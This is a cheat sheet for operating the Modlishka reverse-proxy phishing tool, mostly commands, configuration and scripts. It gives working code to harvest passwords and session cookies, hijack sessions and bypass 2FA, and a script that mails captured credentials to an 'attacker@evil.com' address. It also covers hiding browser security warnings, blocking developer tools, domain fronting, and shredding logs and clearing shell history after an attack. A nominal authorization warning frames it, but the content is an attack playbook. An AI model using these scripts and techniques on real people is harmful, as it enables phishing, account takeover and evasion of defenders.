Appearance
Modlishka Reverse Proxy Phishing Tool Cheat Sheet
Overview
Modlishka is an advanced reverse proxy phishing tool developed by drk1wi that enables sophisticated phishing attacks with 2FA bypass capabilities and session hijacking. It acts as a transparent proxy between the victim and the legitimate website, capturing credentials and session tokens in real-time.
⚠️ Warning: This tool is intended for authorized penetration testing and red team exercises only. Ensure you have proper authorization before using in any environment.
Installation
Pre-compiled Binaries
bash
# Download latest release for Linux
wget https://github.com/drk1wi/Modlishka/releases/latest/download/Modlishka-linux-amd64
chmod +x Modlishka-linux-amd64
# Download for Windows
# Download Modlishka-windows-amd64.exe from GitHub releases
# Download for macOS
wget https://github.com/drk1wi/Modlishka/releases/latest/download/Modlishka-darwin-amd64
chmod +x Modlishka-darwin-amd64Build from Source
bash
# Install Go (version 1.19+)
git clone https://github.com/drk1wi/Modlishka.git
cd Modlishka
make
# Cross-compile for different platforms
make build-allDocker Installation
bash
# Build Docker image
git clone https://github.com/drk1wi/Modlishka.git
cd Modlishka
docker build -t modlishka .
# Run Modlishka in Docker
docker run -it -p 443:443 -p 80:80 modlishkaBasic Usage
Command Line Options
bash
# Basic usage
./Modlishka -target https://example.com -domain evil.com
# With SSL certificate
./Modlishka -target https://example.com -domain evil.com -cert /path/to/cert.crt -certKey /path/to/key.key
# With configuration file
./Modlishka -config config.json
# Debug mode
./Modlishka -target https://example.com -domain evil.com -debugConfiguration File
json
{
"proxyDomain": "evil.com",
"listeningAddress": "0.0.0.0",
"target": "https://example.com",
"targetRes": "",
"targetRules": "PC9oZWFkPg==",
"terminateTriggers": "",
"terminateUrl": "",
"trackingCookie": "id",
"trackingParam": "id",
"jsRules": "",
"forceHTTPS": false,
"forceHTTP": false,
"dynamicMode": false,
"debug": false,
"logPostOnly": false,
"disableSecurity": false,
"log": "requests.log",
"plugins": "all",
"cert": "",
"certKey": "",
"certPool": ""
}Command Reference
Basic Parameters
| Parameter | Description |
|---|---|
-target | Target website URL |
-domain | Phishing domain |
-listeningAddress | Listening IP address |
-cert | SSL certificate file |
-certKey | SSL private key file |
-config | Configuration file path |
Advanced Parameters
| Parameter | Description |
|---|---|
-debug | Enable debug mode |
-log | Log file path |
-plugins | Plugin configuration |
-forceHTTPS | Force HTTPS redirects |
-dynamicMode | Enable dynamic mode |
-disableSecurity | Disable security headers |
Advanced Configuration
SSL/TLS Setup
bash
# Generate self-signed certificate
openssl req -newkey rsa:4096 -nodes -keyout modlishka.key -x509 -days 365 -out modlishka.crt
# Use Let's Encrypt certificate
certbot certonly --standalone -d evil.com
./Modlishka -target https://example.com -domain evil.com -cert /etc/letsencrypt/live/evil.com/fullchain.pem -certKey /etc/letsencrypt/live/evil.com/privkey.pemTarget Rules Configuration
json
{
"targetRules": "base64_encoded_rules",
"jsRules": "base64_encoded_js_rules"
}Content Modification Rules
javascript
// JavaScript rules for content modification
// Base64 encode these rules for targetRules parameter
// Hide security warnings
document.querySelectorAll('.security-warning').forEach(el => el.style.display = 'none');
// Modify page title
document.title = 'Legitimate Service Login';
// Remove security indicators
document.querySelectorAll('.ssl-indicator').forEach(el => el.remove());
// Inject custom CSS
var style = document.createElement('style');
style.textContent = '.phishing-indicator { display: none !important; }';
document.head.appendChild(style);Plugin Configuration
json
{
"plugins": {
"credHarvester": {
"enabled": true,
"params": {
"log": "credentials.log",
"format": "json"
}
},
"sessionHijacker": {
"enabled": true,
"params": {
"cookieLog": "cookies.log"
}
},
"2faBypass": {
"enabled": true,
"params": {
"tokenLog": "tokens.log"
}
}
}
}2FA Bypass Techniques
Session Token Capture
bash
# Modlishka automatically captures session tokens
# Monitor the log file for captured sessions
tail -f requests.log | grep -i "session\|token\|cookie"
# Extract session cookies
grep -o '"cookies":\[.*\]' requests.log | jq '.cookies'Real-time Session Hijacking
python
# Python script to monitor and use captured sessions
import json
import requests
import time
def monitor_sessions(log_file):
with open(log_file, 'r') as f:
f.seek(0, 2) # Go to end of file
while True:
line = f.readline()
if line:
try:
data = json.loads(line)
if 'cookies' in data:
cookies = data['cookies']
# Use captured cookies for session hijacking
hijack_session(cookies)
except:
pass
time.sleep(1)
def hijack_session(cookies):
session = requests.Session()
for cookie in cookies:
session.cookies.set(cookie['name'], cookie['value'])
# Access protected resources
response = session.get('https://example.com/dashboard')
print(f"Session hijack successful: {response.status_code}")TOTP/SMS Bypass
bash
# Modlishka captures 2FA tokens in real-time
# The victim enters the 2FA code on the phishing site
# Modlishka forwards it to the legitimate site
# Session is established and captured
# Monitor 2FA bypass attempts
grep -i "2fa\|totp\|sms\|verification" requests.logEvasion Techniques
Domain Fronting
bash
# Use CDN for domain fronting
./Modlishka -target https://example.com -domain cdn.cloudflare.com -hostHeader evil.com
# Configure DNS for domain fronting
# Point evil.com to CDN IP
# Configure CDN to forward to Modlishka serverTraffic Obfuscation
json
{
"userAgent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36",
"customHeaders": {
"X-Forwarded-For": "192.168.1.100",
"X-Real-IP": "192.168.1.100",
"Accept-Language": "en-US,en;q=0.9"
}
}Anti-Detection Measures
javascript
// Inject anti-detection JavaScript
// Disable developer tools
document.addEventListener('keydown', function(e) {
if (e.key === 'F12' || (e.ctrlKey && e.shiftKey && e.key === 'I')) {
e.preventDefault();
return false;
}
});
// Disable right-click
document.addEventListener('contextmenu', function(e) {
e.preventDefault();
return false;
});
// Clear console
setInterval(function() {
console.clear();
}, 1000);Geolocation Filtering
python
# Python script for geolocation-based filtering
import geoip2.database
from flask import Flask, request, abort
app = Flask(__name__)
reader = geoip2.database.Reader('/path/to/GeoLite2-City.mmdb')
ALLOWED_COUNTRIES = ['US', 'CA', 'GB']
@app.before_request
def check_geolocation():
client_ip = request.environ.get('HTTP_X_REAL_IP', request.remote_addr)
try:
response = reader.city(client_ip)
country_code = response.country.iso_code
if country_code not in ALLOWED_COUNTRIES:
abort(404)
except:
# If geolocation fails, allow access
passCredential Harvesting
Log Analysis
bash
# Extract credentials from logs
grep -o '"username":"[^"]*"' requests.log | cut -d'"' -f4 | sort -u
grep -o '"password":"[^"]*"' requests.log | cut -d'"' -f4
# Extract email addresses
grep -oE '[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}' requests.log | sort -u
# Extract session tokens
grep -o '"sessionToken":"[^"]*"' requests.log | cut -d'"' -f4Real-time Monitoring
python
# Real-time credential monitoring
import json
import time
import smtplib
from email.mime.text import MIMEText
def monitor_credentials(log_file):
with open(log_file, 'r') as f:
f.seek(0, 2)
while True:
line = f.readline()
if line:
try:
data = json.loads(line)
if 'username' in data and 'password' in data:
send_notification(data['username'], data['password'])
except:
pass
time.sleep(1)
def send_notification(username, password):
msg = MIMEText(f"New credentials captured:\nUsername: {username}\nPassword: {password}")
msg['Subject'] = 'Modlishka - Credentials Captured'
msg['From'] = 'modlishka@evil.com'
msg['To'] = 'attacker@evil.com'
server = smtplib.SMTP('localhost')
server.send_message(msg)
server.quit()Database Storage
python
# Store credentials in database
import sqlite3
import json
def store_credentials(log_file, db_file):
conn = sqlite3.connect(db_file)
cursor = conn.cursor()
# Create table
cursor.execute('''
CREATE TABLE IF NOT EXISTS credentials (
id INTEGER PRIMARY KEY,
timestamp TEXT,
username TEXT,
password TEXT,
ip_address TEXT,
user_agent TEXT
)
''')
with open(log_file, 'r') as f:
for line in f:
try:
data = json.loads(line)
if 'username' in data and 'password' in data:
cursor.execute('''
INSERT INTO credentials
(timestamp, username, password, ip_address, user_agent)
VALUES (?, ?, ?, ?, ?)
''', (
data.get('timestamp'),
data.get('username'),
data.get('password'),
data.get('ip'),
data.get('userAgent')
))
except:
pass
conn.commit()
conn.close()Operational Security
Infrastructure Setup
bash
# Use VPS with clean IP reputation
# Implement proper DNS configuration
# Use legitimate SSL certificates
# Set up redirectors and load balancersLog Management
bash
# Rotate logs to prevent disk space issues
logrotate -f /etc/logrotate.d/modlishka
# Secure log storage
chmod 600 requests.log
chown root:root requests.log
# Remote log shipping
rsync -avz requests.log user@backup-server:/logs/Cleanup Procedures
bash
# Secure deletion of logs
shred -vfz -n 3 requests.log
shred -vfz -n 3 credentials.log
# Clear system logs
journalctl --vacuum-time=1d
# Clear bash history
history -c
rm ~/.bash_historyTroubleshooting
Connection Issues
bash
# Test target connectivity
curl -I https://example.com
# Check DNS resolution
dig evil.com
nslookup evil.com
# Test SSL certificate
openssl s_client -connect evil.com:443 -servername evil.comSSL/TLS Issues
bash
# Verify certificate
openssl x509 -in modlishka.crt -text -noout
# Check certificate chain
openssl verify -CAfile ca.crt modlishka.crt
# Test SSL configuration
sslscan evil.com:443Performance Issues
bash
# Monitor resource usage
top -p $(pgrep Modlishka)
# Check network connections
netstat -tulpn | grep Modlishka
# Monitor disk usage
df -h
du -sh requests.logDebug Mode
bash
# Enable debug logging
./Modlishka -target https://example.com -domain evil.com -debug
# Analyze debug output
tail -f debug.log | grep -i error
# Check for common issues
grep -i "certificate\|ssl\|tls\|dns" debug.logDetection Evasion
Network Level
- Use legitimate domains and certificates
- Implement proper DNS configuration
- Use CDN and domain fronting
- Vary traffic patterns and timing
- Implement proper error handling
Application Level
- Mimic legitimate website behavior
- Use proper HTTP headers and responses
- Implement anti-bot measures
- Use legitimate user agents
- Handle edge cases gracefully
Behavioral
- Limit attack duration
- Target specific users/organizations
- Use social engineering for initial access
- Implement proper cleanup procedures
- Monitor for detection indicators
Resources
- Modlishka GitHub Repository
- Modlishka Documentation
- drk1wi Blog
- Reverse Proxy Phishing Techniques
- 2FA Bypass Research
This cheat sheet provides a comprehensive reference for using Modlishka. Always ensure you have proper authorization before using this tool in any environment.